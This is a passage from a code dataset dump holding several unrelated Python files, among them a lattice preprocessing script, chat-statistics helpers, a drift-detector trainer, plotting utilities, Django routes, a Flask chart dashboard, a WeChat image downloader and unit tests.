q_w, minkowski_eig, NN_count, cache_NN_index_temp, cache_q_l6_m_temp = features_extract(i, ridge_points, ridge_vertices, points, vertices)\r\n feature_temp = output_features(h_dis, h_angle, q_w, minkowski_eig, NN_count)\r\n features.append(feature_temp)\r\n cache_NN_index.append(cache_NN_index_temp)\r\n cache_q_l6_m.append(cache_q_l6_m_temp)\r\n\r\n filtered_particle, filtered_features, disorders, unfilterable_particle = disorder_filter(particle, cache_NN_index, cache_q_l6_m, features)\r\n return filtered_particle, filtered_features, disorders, unfilterable_particle, particle_eliminated # filtered_particle/eliminated list [(particle_index, particle coordinate)...], filter_features list [[]...], disorders list [],unfilterable_particle list[[(index, coordinate),[feature]],...]\r\n\r\n\r\n#test\r\ncrystal_lattice = crystal_lattice_bcc(5)\r\nfiltered_particle, filtered_features, disorders, unfilterable_particle, particle_eliminated = pre_processing(crystal_lattice)\r\nprint(len(filtered_particle))\r\nprint(len(unfilterable_particle))\r\nprint(len(particle_eliminated))\r\n#inner = [item[1] for item in particle]\r\n#x,y,z = zip(*inner)\r\n#xx,yy,zz = zip(*crystal_lattice)\r\n#fig = plt.figure()\r\n#ax = fig.gca(projection='3d')\r\n#ax.scatter(x,y,z,color='black', marker='o')\r\n#ax.scatter(xx,yy,zz,color='green', marker='*')\r\n#plt.show()\r\n\r\ndata_save(crystal_lattice, filtered_particle, filtered_features, disorders, unfilterable_particle, particle_eliminated)\r\n\r\n","sub_path":"pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"613327896","text":"import emoji\nimport datetime\nimport numpy as np\nimport six\nimport matplotlib.pyplot as plt\n\n# Teeb täpitähed nähtavaks.\ndef parseString(str):\n t = str.encode('latin1').decode('utf8')\n e = \"\"\n i = 0\n while i < (len(t)):\n if t[i] in emoji.UNICODE_EMOJI:\n e += t[i] + \" \"\n t = t[:i] + ' ' + t[i + 1:]\n i -= 1\n i += 1\n symbols = [\n \",\", \".\", \";\", \":\", \"*\", \"'\", \"\\\"\",\n \"-\", \"_\", \"<\", \">\", \"!\", \"@\", \"#\",\n \"£\", \"¤\", \"$\", \"%\", \"&\", \"/\", \"{\", \"}\",\n \"(\", \")\", \"[\", \"]\", \"=\", \"?\", \"+\", \"´\", \"´´\", \"ˇ\", \"|\"\n ]\n for sy in symbols:\n t = t.replace(sy, \" \")\n return t.strip(), e.strip()\n\n\n# Dictionary väärtuste summa.\ndef dictSum(myDict):\n sum = 0\n for i in myDict:\n sum = sum + myDict[i]\n return sum\n\n\ndef on_contenti(msg):\n try:\n c = msg[\"content\"]\n\n return True\n except:\n return False\n\n\ndef plotLisa(largest):\n if largest < 10:\n return 2\n if largest < 100:\n return 20\n if largest < 10000:\n return largest * 0.1\n if largest < 15000:\n return largest * 0.2\n if largest < 35000:\n return largest * 0.2\n if largest < 70000:\n return largest * 0.15\n if largest < 100000:\n return largest * 0.08\n return round(largest * 0.14)\n\n\ndef kuupäev(ts):\n return datetime.datetime.fromtimestamp(ts / 1000.0).date()\n\n\ndef yearmonth(ts):\n kp = kuupäev(ts)\n return (str(kp.year) + str(kp.strftime('%h')))\n\n\ndef algus(messages):\n ts = messages[0][\"timestamp_ms\"]\n return kuupäev(ts)\n\n\ndef lõpp(messages):\n ts = messages[len(messages) - 1][\"timestamp_ms\"]\n return kuupäev(ts)\n\n\ndef save_df(data, filename, row_height=0.625, font_size=14,\n header_color='#40466e', row_colors=['#f1f1f2', 'w'], edge_color='w',\n bbox=[0, 0, 1, 1], header_columns=0,\n ax=None, **kwargs):\n longest = 0\n for row in data.itertuples():\n for colname in data.columns:\n n = (data.at[row.Index, colname])\n if len(n) > longest:\n longest = len(n)\n if len(colname) > longest:\n longest = len(colname)\n\n tegur = 0.1715\n if longest < 5:\n tegur = 0.24\n if longest < 10:\n tegur = 0.2\n if longest < 31:\n tegur = 0.18\n\n col_width = longest * tegur\n if ax is None:\n size = (np.array(data.shape[::-1]) + np.array([0, 1])) * np.array([col_width, row_height])\n fig, ax = plt.subplots(figsize=size)\n ax.axis('off')\n\n mpl_table = ax.table(cellText=data.values, bbox=bbox, colLabels=data.columns, **kwargs)\n\n mpl_table.auto_set_font_size(False)\n mpl_table.set_fontsize(font_size)\n\n for k, cell in six.iteritems(mpl_table._cells):\n cell.set_edgecolor(edge_color)\n if k[0] == 0 or k[1] < header_columns:\n cell.set_text_props(weight='bold', color='w')\n cell.set_facecolor(header_color)\n else:\n cell.set_facecolor(row_colors[k[0] % len(row_colors)])\n ax.get_figure().savefig(\"results\\\\plots\\\\\" + filename)\n plt.close()\n\n\ndef kellaaeg(timestamp):\n return datetime.datetime.fromtimestamp(timestamp / 1000.0).time()\n","sub_path":"abistajad.py","file_name":"abistajad.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317119696","text":"# pylint: disable=W0611\n'''Regression model trained on different types of drift accuracy on original model.'''\nimport numpy as np\n\nfrom joblib import load, dump\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n\nfrom train_model.text_preprocessing import prepare, _extract_message_len, _text_process\nfrom train_model.util import load_data, DATASET_DIR, DATA_DRIFT_DIR\nfrom deploy_model.util import load_best_clf\n\nclass RegressionModel():\n '''Class containing the Regression Model training methods.'''\n datasets: list\n drift_detector: any\n classifier: any\n preprocessor: any\n\n def __init__(self) -> None:\n self.set_datasets()\n self.drift_detector = SVR()\n self.classifier, _ = load_best_clf()\n self.preprocessor = load('output/preprocessor.joblib')\n\n def set_datasets(self):\n '''Set the datasets to train model on.'''\n self.datasets = [DATASET_DIR + 'SMSSpamCollection',\n DATA_DRIFT_DIR + 'drift_flip.txt',\n DATA_DRIFT_DIR + 'drift_random_0.5.txt',\n DATA_DRIFT_DIR + 'drift_mutation.txt',\n DATA_DRIFT_DIR + 'drift_concept.txt',\n DATA_DRIFT_DIR + 'drift_ham_only.txt',\n DATA_DRIFT_DIR + 'drift_spam_only.txt']\n\n def train_regression_model(self):\n '''Trains the regression model on all supplied datasets.'''\n percentiles_stats = []\n scores = []\n\n for index, data_set in enumerate(self.datasets):\n raw_data = load_data(data_set)\n for batch in range(25):\n print(f\"Train logistic drift detector epoch {batch}, dataset {index}\")\n\n x_sample, _ = train_test_split(raw_data, test_size=0.3, random_state=batch)\n y_sample = x_sample['label']\n x_sample = self.preprocessor.transform(x_sample['message'])\n\n classifier_stats = [x[0] for x in self.classifier.predict_proba(x_sample)]\n classifier_res = self.classifier.predict(x_sample)\n print(accuracy_score(classifier_res, y_sample))\n\n percentiles_stats += [\n [np.percentile(classifier_stats, i) for i in range(0, 101, 5)]]\n scores += [accuracy_score(classifier_res, y_sample)]\n\n self.drift_detector.fit(percentiles_stats, scores)\n dump(self.drift_detector, 'output/regression/regression_model.joblib')\n\n\nif __name__ == \"__main__\":\n RegressionModel().train_regression_model()\n","sub_path":"train_model/regression_model.py","file_name":"regression_model.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496140979","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 29 12:10:19 2020\n\n@author: Daniel.Feeney\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n# Read in files\n# only read .asc files for this work\nfPath = 'C:/Users/kate.harrison/Dropbox (Boa)/EndurancePerformance/NewBalanceRoadRacing_Jan2020/PressureData/'\nfileExt = r\".mva\"\nentries = [fName for fName in os.listdir(fPath) if fName.endswith(fileExt)]\n\n# Define constants and options\nfThresh = 30 #below this value will be set to 0.\nstepLen = 45 #Set value to look forward \n# list of functions \n# finding landings on the force plate once the filtered force exceeds the force threshold\ndef findLandings(force):\n lic = []\n for step in range(len(force)-1):\n if force[step] == 0 and force[step + 1] >= fThresh:\n lic.append(step)\n return lic\n\n#Find takeoff from FP when force goes from above thresh to 0\ndef findTakeoffs(force):\n lto = []\n for step in range(len(force)-1):\n if force[step] >= fThresh and force[step + 1] == 0:\n lto.append(step + 1)\n return lto\n\n### File Structure: Dorsal Forefoot, Metatarsals (.1), Midfoot (.2), plantar mets (.3), plantar toes (.4), plantar heel (.5)\nsdFF = []\nmeanFF = []\nsdMF = []\nmeanMF = []\nsdMets = []\nmeanMets = []\nmaxMF = []\nmaxFF = []\nmaxMets = []\n\nsdPlantMetP = []\nmeanPlantMetP = []\nsdToeP = []\nmeanToeP = []\nsdHeelP = []\nmeanHeelP = []\nmaxPlantMetP = []\nmaxToeP = []\nmaxHeelP = []\n\nHeelPMidStance = []\nHeelRateDecay = []\ntrial = []\nSubject = []\nCondition = []\nConfig = []\n\n#first columns (FF, Mets, and MF) all relate to dorsal values. Once you get to PlantMetsForce it is plantar metatarsal force \n#and everything to the right of that column is plantar side. Each location (e.g. FF, MF, etc.) has force, max Pressure, Mean Pressure, and pct\n\nfor file in entries:\n try:\n \n fName = file #Load one file at a time\n \n subName = fName.split(sep = \"_\")[0]\n ConditionTmp = fName.split(sep=\"_\")[1]\n ConfigTmp = fName.split(sep=\"_\")[2]\n \n dat = pd.read_csv(fPath+fName,sep='\\t', skiprows = 15, header = 0)\n \n dat.columns = ['Time','FFForce', 'FFMaxP', 'FFMeanP', 'FFpct', 'MetsForce', 'MetsMaxP', 'MetsMeanP','Metspct', \n 'MFForce','MFMaxP', 'MFMeanP', 'MFpct', 'PlantMetsForce','PlantMetsMaxP', 'PlantMetsMeanP', 'PlantMetsPct',\n 'ToesForce','ToesMaxP','ToesMeanP','ToesPct','HeelForce', 'HeelMaxP', 'HeelMeanP','HeelPct']\n dat['Force'] = dat.HeelForce + dat.ToesForce + dat.PlantMetsForce\n # filtering force to find landings/takeoffs \n forceTot = dat.Force\n forceTot[forceTot go.Scatter:\n\n data = line.load(start, end)\n mode = ''\n linestyle = None\n marker = None\n if line.linestyle:\n mode = 'lines'\n dash_dict = {'-': 'solid', ':': 'dot', '.': 'dot', '--': 'dash', '-.': 'dashdot'}\n linestyle = {'color': line.color, 'dash': dash_dict[line.linestyle], 'width': line.linewidth}\n if line.marker:\n mode = 'lines+markers' if mode else 'markers'\n symboldict = {'o': 'circle', 'x': 'x-thin', ',': 'line-ns', '+': 'cross-thin', '*': 'asterisk', '.': 'circle'}\n if line.marker in symbols:\n symbol = line.marker\n else:\n symbol = symboldict.get(line.marker, 'circle')\n\n marker = {'color': line.color, 'symbol': symbol}\n\n return go.Scatter(x=data.index, y=data, mode=mode, line=linestyle, marker=marker, name=line.name)\n\n\ndef _make_figure(plot: Plot) -> go.Figure:\n rows = -(-len(plot.subplots) // plot.columns)\n fig = make_subplots(rows, plot.columns, shared_xaxes=True)\n subplot_positions = sum(([i] * len(sp.lines) for i, sp in enumerate(plot.subplots)), [])\n rows = [1 + i // plot.columns for i in subplot_positions]\n cols = [1 + i % plot.columns for i in subplot_positions]\n for i, sp in enumerate(plot.subplots):\n row, col = 1 + i // plot.columns, 1 + i % plot.columns\n if sp.ylim:\n fig.update_yaxes(range=list(sp.ylim), row=row, col=col)\n\n fig.update_yaxes()\n fig.add_traces(\n [\n _draw_line(l, plot.start, plot.end)\n for l in plot.lines()\n ],\n rows=rows,\n cols=cols\n )\n\n fig.update_yaxes()\n fig.update_layout(width=plot.size[0], height=plot.size[1], template='none')\n return fig\n\n\ndef to_image(plot: Plot, format: str) -> bytes:\n \"\"\"\n Draws the plot and returns a byte string containing the image\n \"\"\"\n fig = _make_figure(plot)\n return fig.to_image(format=format)\n\n\ndef to_html(plot: Plot)->bytes:\n \"\"\"\n Draws the plot to include into an html page, here as svg.\n Alternative could be as an element with base64 data\n \"\"\"\n fig = _make_figure(plot)\n return fig.to_html(include_plotlyjs='cdn').encode('utf-8')\n\n\nsymbols = [\n \"circle\", \"circle-open\", \"circle-dot\", \"circle-open-dot\",\n \"square\", \"square-open\", \"square-dot\", \"square-open-dot\",\n \"diamond\", \"diamond-open\", \"diamond-dot\", \"diamond-open-dot\",\n \"cross\", \"cross-open\", \"cross-dot\", \"cross-open-dot\", \"x\",\n \"x-open\", \"x-dot\", \"x-open-dot\", \"triangle-up\",\n \"triangle-up-open\", \"triangle-up-dot\", \"triangle-up-open-dot\",\n \"triangle-down\", \"triangle-down-open\", \"triangle-down-dot\",\n \"triangle-down-open-dot\", \"triangle-left\", \"triangle-left-open\",\n \"triangle-left-dot\", \"triangle-left-open-dot\", \"triangle-right\",\n \"triangle-right-open\", \"triangle-right-dot\", \"triangle-right-open-dot\",\n \"triangle-ne\", \"triangle-ne-open\", \"triangle-ne-dot\",\n \"triangle-ne-open-dot\", \"triangle-se\", \"triangle-se-open\",\n \"triangle-se-dot\", \"triangle-se-open-dot\", \"triangle-sw\", \"triangle-sw-open\", \"triangle-sw-dot\", \"triangle-sw-open-dot\" ,\n \"triangle-nw\", \"triangle-nw-open\", \"triangle-nw-dot\" ,\n \"triangle-nw-open-dot\", \"pentagon\", \"pentagon-open\", \"pentagon-dot\",\n \"pentagon-open-dot\", \"hexagon\", \"hexagon-open\", \"hexagon-dot\", \"hexagon-open-dot\", \"hexagon2\", \"hexagon2-open\", \"hexagon2-dot\", \"hexagon2-open-dot\", \"octagon\", \"octagon-open\",\n \"octagon-dot\", \"octagon-open-dot\", \"star\", \"star-open\",\n \"star-dot\", \"star-open-dot\", \"hexagram\", \"hexagram-open\",\n \"hexagram-dot\", \"hexagram-open-dot\", \"star-triangle-up\", \"star-triangle-up-open\", \"star-triangle-up-dot\", \"star-triangle-up-open-dot\" ,\n \"star-triangle-down\", \"star-triangle-down-open\", \"star-triangle-down-dot\",\n \"star-triangle-down-open-dot\", \"star-square\", \"star-square-open\", \"star-square-dot\", \"star-square-open-dot\", \"star-diamond\" ,\n \"star-diamond-open\", \"star-diamond-dot\", \"star-diamond-open-dot\" ,\n \"diamond-tall\", \"diamond-tall-open\", \"diamond-tall-dot\" ,\n \"diamond-tall-open-dot\", \"diamond-wide\", \"diamond-wide-open\" ,\n \"diamond-wide-dot\", \"diamond-wide-open-dot\", \"hourglass\" ,\n \"hourglass-open\", \"bowtie\", \"bowtie-open\", \"circle-cross\" ,\n \"circle-cross-open\", \"circle-x\", \"circle-x-open\", \"square-cross\" ,\n \"square-cross-open\", \"square-x\", \"square-x-open\", \"diamond-cross\",\n \"diamond-cross-open\", \"diamond-x\", \"diamond-x-open\",\n \"cross-thin\", \"cross-thin-open\", \"x-thin\", \"x-thin-open\",\n \"asterisk\", \"asterisk-open\", \"hash\", \"hash-open\",\n \"hash-dot\", \"hash-open-dot\", \"y-up\", \"y-up-open\", \"y-down\",\n \"y-down-open\", \"y-left\", \"y-left-open\", \"y-right\", \"y-right-open\", \"line-ew\", \"line-ew-open\", \"line-ns\", \"line-ns-open\", \"line-ne\", \"line-ne-open\", \"line-nw\" ,\n \"line-nw-open\", \"arrow-up\", \"arrow-up-open\", \"arrow-down\" ,\n \"arrow-down-open\", \"arrow-left\", \"arrow-left-open\", \"arrow-right\" ,\n \"arrow-right-open\", \"arrow-bar-up\", \"arrow-bar-up-open\" ,\n \"arrow-bar-down\", \"arrow-bar-down-open\", \"arrow-bar-left\" ,\n \"arrow-bar-left-open\", \"arrow-bar-right\", \"arrow-bar-right-open\"\n]\n","sub_path":"odmf/plot/draw_plotly.py","file_name":"draw_plotly.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"188795432","text":"from django.conf.urls import patterns, include, url\nfrom comics.feeds import LatestEntriesFeed\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'threepanel.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', 'comics.views.home', name='home'),\n url(r'^manage', 'comics.views.manage', name='manage'),\n url(r'^dashboard/', include('dashboard.urls')),\n url(r'^comics/', include('comics.urls')),\n url(r'^subscribe/', include('publish.urls')),\n url(r'^pages/', include('pages.urls')),\n url(r'^subscribe$', 'publish.views.subscribe'),\n url(r'rss.xml', LatestEntriesFeed())\n)\n","sub_path":"threepanel/threepanel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129479998","text":"import re\nimport requests\nfrom urllib import request\nresp = requests.get(url='http://mp.weixin.qq.com/s/Z6OeRHUfiUyKIV-KG7Eb8w')\nregx = \"https://mmbiz.qpic.cn/mmbiz_jpg/.*?wx_fmt=jpeg\"\npic = re.findall(regx,resp.text)\nstorePATH = \"/Users/fangdongliang/Desktop/pic/\"\ncount = 0\nfor item in pic:\n\tcount += 1\n\tfilename = storePATH+str(count)+\".jpeg\" \n\twith request.urlopen(item) as stream:\n\t\tpic_stream = stream.read()\n\twith open(filename,\"wb\") as outfile:\n\t\toutfile.write(pic_stream)\n\t\t","sub_path":"Others/wx_pic_spider.py","file_name":"wx_pic_spider.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"399167891","text":"from flask import Flask, render_template\nimport pandas as pd\nimport time\n\napp = Flask(__name__)\ndata = pd.read_csv(\"data/data.csv\")\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index(chart1ID='chart1_ID', chart1_type='bar',\n chart2ID='chart2_ID', chart2_type='bar',\n chart3ID='chart3_ID', chart3_type='column',\n chart4ID='chart4_ID',\n chart5ID='chart5_ID', chart5_type='bar',\n chart6ID='chart6_ID', chart6_type='column'):\n # Chart1\n maleCount = data[data['Gender'] == 'M'][\"Gender\"].count()\n femaleCount = data[data['Gender'] == 'F'][\"Gender\"].count()\n total = maleCount + femaleCount\n malePercentage = ((maleCount / total) * 100).round(2)\n femalePercentage = ((femaleCount / total) * 100).round(2)\n\n chart1 = {\"renderTo\": chart1ID, \"type\": chart1_type}\n series1 = [{\"name\": 'Male', \"data\": [malePercentage], \"color\": \"#00FFFF\"},\n {\"name\": 'Female', \"data\": [femalePercentage], \"color\": \"#DC143C\"}]\n title1 = {\"text\": 'Male vs Female Ratio'}\n xAxis1 = {\"categories\": ['Gender']}\n yAxis1 = {\"title\": {\"text\": 'Percentage (%)'}}\n plotOptions1 = {\"bar\": {\"stacking\": \"normal\", 'dataLabels': {'enabled': 'true'}}}\n tooltip1 = {\"borderRadius\": \"20\"}\n credits = {\"text\": 'Made by VARUN NAGRARE', \"href\": 'https://www.facebook.com/Wolvarun9295',\n \"style\": {\"fontSize\": '10px', 'color': \"#FF0000\"}}\n\n ###################################################################################################################\n # Chart2\n python = []\n automation = []\n nodejs = []\n java = []\n ios = []\n devops = []\n de = []\n ml = []\n\n python.append(data[data['Technology'] == 'Python'][\"Technology\"].count())\n automation.append(data[data['Technology'] == 'Automation'][\"Technology\"].count())\n nodejs.append(data[data['Technology'] == 'NodeJs'][\"Technology\"].count())\n java.append(data[data['Technology'] == 'Java'][\"Technology\"].count())\n ios.append(data[data['Technology'] == 'IOS'][\"Technology\"].count())\n devops.append(data[data['Technology'] == 'DevOps'][\"Technology\"].count())\n de.append(data[data['Technology'] == 'Data Engineering'][\"Technology\"].count())\n ml.append(data[data['Technology'] == 'Machine Learning'][\"Technology\"].count())\n\n chart2 = {\"renderTo\": chart2ID, \"type\": chart2_type}\n series2 = [\n {\"name\": 'Automation', \"data\": automation, \"color\": \"#FF8000\"},\n {\"name\": 'Data Engineering', \"data\": de, \"color\": \"#CD00FF\"},\n {\"name\": 'DevOps', \"data\": devops, \"color\": \"#0027FF\"},\n {\"name\": 'IOS', \"data\": ios, \"color\": \"#00FFFF\"},\n {\"name\": 'Java', \"data\": java, \"color\": \"#74FF00\"},\n {\"name\": 'Machine Learning', \"data\": ml, \"color\": \"#FF00A2\"},\n {\"name\": 'NodeJS', \"data\": nodejs, \"color\": \"#FFF300\"},\n {\"name\": 'Python', \"data\": python, \"color\": \"#FF0000\"},\n ]\n title2 = {\"text\": 'Techwise Bar Chart'}\n xAxis2 = {\"categories\": ['Technology']}\n yAxis2 = {\"title\": {\"text\": 'No. of People'}}\n plotOptions2 = {\"bar\": {'dataLabels': {'enabled': 'true'}}}\n\n ###################################################################################################################\n # Chart3\n labX = data[data['Lab'] == 'Bangalore']['Lab'].count()\n labY = data[data['Lab'] == 'Mumbai']['Lab'].count()\n chart3 = {\"renderTo\": chart3ID, \"type\": chart3_type, \"polar\": \"true\", \"inverted\": \"true\"}\n series3 = [{\"name\": 'Bangalore', \"data\": [labX], \"color\": \"#B500FE\"},\n {\"name\": 'Mumbai', \"data\": [labY], \"color\": \"#00FE7B\"}]\n title3 = {\"text\": 'Distribution of People in Lab X and Y'}\n xAxis3 = {\"categories\": ['LAB']}\n yAxis3 = {\"crosshair\": {\"enabled\": \"true\", \"color\": \"#333\"}}\n plotOptions3 = {\"column\": {'dataLabels': {'enabled': 'true'}}}\n pane3 = {\"size\": \"85%\", \"innerSize\": \"20%\", \"endAngle\": \"300\"}\n\n ###################################################################################################################\n # Chart4\n technology = []\n people = []\n for i in data.Technology.unique():\n technology.append(i)\n people.append(data[data['Technology'] == i][\"Technology\"].count())\n chart4 = {\"renderTo\": chart4ID}\n series4 = [{\"type\": \"areaspline\", \"name\": 'Technologies (Areaspline Chart)', \"data\": people, \"color\": \"#FF1493\"},\n {\"type\": \"column\", \"name\": 'Technologies (Column Chart)', \"data\": people, \"color\": \"#006CFE\"}]\n title4 = {\"text\": 'Techwise Distribution Chart'}\n xAxis4 = {\"categories\": technology}\n yAxis4 = {\"title\": {\"text\": 'No. of People'}}\n plotOptions4 = {\"areaspline\": {'dataLabels': {'enabled': 'true'}}, \"column\": {'dataLabels': {'enabled': 'true'}}}\n\n ###################################################################################################################\n # Chart5\n company = []\n for i in data.Company.unique():\n company.append(i)\n\n company.sort()\n\n dataFrame = data\n dataFrame.rename(columns={'Unnamed: 0': 'id'}, inplace=True)\n dataFrame = dataFrame[['Technology', 'Company', 'id']]\n techCount = dataFrame.groupby([\"Technology\", \"Company\"])[\"id\"].count().unstack(fill_value=0).stack().reset_index(\n name=\"count\")\n techList = techCount[\"Technology\"].unique().tolist()\n\n finalList = []\n for tech in techList:\n tech = techCount[techCount[\"Technology\"].str.contains(tech)]\n finalList.append(tech)\n\n automation = finalList[0]['count'].tolist()\n de = finalList[1]['count'].tolist()\n devops = finalList[2]['count'].tolist()\n ios = finalList[3]['count'].tolist()\n java = finalList[4]['count'].tolist()\n ml = finalList[5]['count'].tolist()\n nodejs = finalList[6]['count'].tolist()\n python = finalList[7]['count'].tolist()\n\n chart5 = {\"renderTo\": chart5ID, \"type\": chart5_type}\n series5 = [\n {\"name\": 'Automation', \"data\": automation, \"color\": \"#CC00FE\"},\n {\"name\": 'Data Engineering', \"data\": de, \"color\": \"#006CFE\"},\n {\"name\": 'DevOps', \"data\": devops, \"color\": \"#FE0068\"},\n {\"name\": 'IOS', \"data\": ios, \"color\": \"#FE00BD\"},\n {\"name\": 'Java', \"data\": java, \"color\": \"#00FE45\"},\n {\"name\": 'Machine Learning', \"data\": ml, \"color\": \"#FEEB00\"},\n {\"name\": 'NodeJS', \"data\": nodejs, \"color\": \"#FE8300\"},\n {\"name\": 'Python', \"data\": python, \"color\": \"#FE0000\"}\n ]\n title5 = {\"text\": 'Company vs Technologies Stacked Bar Chart'}\n xAxis5 = {\"categories\": company, \"title\": {\"text\": \"Companies\"}}\n yAxis5 = {\"title\": {\"text\": \"No. of People\"}}\n plotOptions5 = {\"bar\": {\"stacking\": \"normal\"}}\n tooltip2 = {\"borderRadius\": \"20\", \"shared\": \"true\"}\n\n ###################################################################################################################\n # Chart6\n lab = []\n for i in data.Lab.unique():\n lab.append(i)\n\n dataFrame = data\n dataFrame.rename(columns={'Unnamed: 0': 'id'}, inplace=True)\n dataFrame = dataFrame[['Gender', 'Lab', 'id']]\n sexCount = dataFrame.groupby([\"Gender\", \"Lab\"])[\"id\"].count().unstack(fill_value=0).stack().reset_index(\n name=\"count\")\n genderList = sexCount[\"Gender\"].unique().tolist()\n\n finalList = []\n for sex in genderList:\n sex = sexCount[sexCount[\"Gender\"].str.contains(sex)]\n finalList.append(sex)\n\n female = finalList[0]['count'].tolist()\n male = finalList[1]['count'].tolist()\n\n chart6 = {\"renderTo\": chart6ID, \"type\": chart6_type, \"polar\": \"true\", \"inverted\": \"true\"}\n series6 = [{\"name\": 'Male', \"data\": male, \"color\": \"#00FFFF\"},\n {\"name\": 'Female', \"data\": female, \"color\": \"#DC143C\"}]\n title6 = {\"text\": \"Distribution of Males and Females in Lab X and Y\"}\n xAxis6 = {\"categories\": lab}\n yAxis6 = {\"crosshair\": {\"enabled\": \"true\", \"color\": \"#333\"}}\n plotOptions6 = {\"column\": {'dataLabels': {'enabled': 'true'}}}\n pane6 = {\"size\": \"85%\", \"innerSize\": \"20%\", \"endAngle\": \"300\"}\n\n return render_template('index.html',\n chart1ID=chart1ID, chart1=chart1, series1=series1, title1=title1,\n xAxis1=xAxis1, yAxis1=yAxis1, plotOptions1=plotOptions1, tooltip1=tooltip1, credits=credits,\n chart2ID=chart2ID, chart2=chart2, series2=series2, title2=title2, xAxis2=xAxis2,\n yAxis2=yAxis2, plotOptions2=plotOptions2, tooltip2=tooltip2,\n chart3ID=chart3ID, chart3=chart3, series3=series3, title3=title3, xAxis3=xAxis3,\n yAxis3=yAxis3, plotOptions3=plotOptions3, pane3=pane3,\n chart4ID=chart4ID, chart4=chart4, series4=series4, title4=title4, xAxis4=xAxis4,\n yAxis4=yAxis4, plotOptions4=plotOptions4,\n chart5ID=chart5ID, chart5=chart5, series5=series5, title5=title5, xAxis5=xAxis5,\n yAxis5=yAxis5, plotOptions5=plotOptions5,\n chart6ID=chart6ID, chart6=chart6, series6=series6, title6=title6, xAxis6=xAxis6,\n yAxis6=yAxis6, plotOptions6=plotOptions6, pane6=pane6,\n reload=time.time())\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378184703","text":"#Importing libraries\r\nfrom detecto import core, utils\r\nfrom detecto.visualize import show_labeled_image, plot_prediction_grid\r\nfrom torchvision import transforms\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n#Image augmentation\r\ncustom_transforms = transforms.Compose([\r\ntransforms.ToPILImage(),\r\ntransforms.Resize(900),\r\ntransforms.RandomHorizontalFlip(0.5),\r\ntransforms.ColorJitter(saturation=0.2),\r\ntransforms.ToTensor(),\r\nutils.normalize_transform(),\r\n])\r\n\r\n#Model training\r\nTrain_dataset = core.Dataset('images/', transform=custom_transforms)#L1\r\nTest_dataset = core.Dataset('images/')#L2\r\nloader = core.DataLoader(Train_dataset, batch_size=2, shuffle=True)#L3\r\nmodel = core.Model(['dog'])#L4\r\nlosses = model.fit(loader, Test_dataset, epochs=25, lr_step_size=5, learning_rate=0.001, verbose=True)#L5\r\n\r\n#Model saving\r\nmodel.save('custom_model_weights.pth')\r\n\r\n\r\n#Inputting test image\r\nimage = utils.read_image('images/dog/n02085620_574.jpg')\r\n\r\n#Initializes the trained model\r\nmodel = core.Model.load('custom_model_weights.pth', ['dog'])\r\n\r\n#Evaluating model\r\nlabels, boxes, scores = model.predict_top(image)\r\n\r\n#Outputting predictions\r\nshow_labeled_image(image, boxes, labels)\r\nprint(labels, boxes, scores)\r\nplt.plot(losses)\r\nplt.show()\r\n","sub_path":"AI & ML/pytorch detecto training and prediction tutorial.py","file_name":"pytorch detecto training and prediction tutorial.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"260598914","text":"import unittest\nfrom unittest import mock\n\nfrom Week6B.book import Book\n\n\nclass BookTestSuite(unittest.TestCase):\n def test_init_correctParameters_setAllNecessaryAttributes(self):\n b = Book(\"132350882\", \"Clean Code\", \"Robert C. Martin\")\n self.assertEqual(b.isbn, \"132350882\", \"-0.25: ISBN is not set!\")\n self.assertEqual(b.title, \"Clean Code\", \"-0.25: title is not set!\")\n self.assertEqual(b.author, \"Robert C. Martin\", \"-0.25: author is not set!\")\n self.assertIsNone(b.price, \"-0.25: price is not set!\")\n\n def test_set_price_10_setThePriceTo10(self):\n b = Book(\"132350882\", \"Clean Code\", \"Robert C. Martin\")\n expected_price = 10\n b.set_price(expected_price)\n self.assertEqual(expected_price, b.price)\n\n def test_open_noArgs_printCorrectText(self):\n title = \"Clean Code\"\n author = \"Robert C. Martin\"\n b = Book(\"132350882\", title, author)\n print_mock = mock.MagicMock()\n\n with mock.patch(\"builtins.print\", print_mock):\n b.open()\n\n print_mock.assert_called_with(\"The {} written by {} is opened.\".format(title, author))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Week6B/book_tests.py","file_name":"book_tests.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"68650605","text":"import logging\nimport math\nfrom pathlib import Path\nfrom typing import List, Tuple\n\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import Dense\nimport tensorflow.keras.initializers as initializers\n\n\nlogger = logging.getLogger()\n\n\nclass SimpleModel(Model):\n \"\"\"Feed Forward Neural Network that represents a stochastic policy\n for continuous action spaces. Mu and sigma are calculated using\n the same internal layers.\n \"\"\"\n\n def 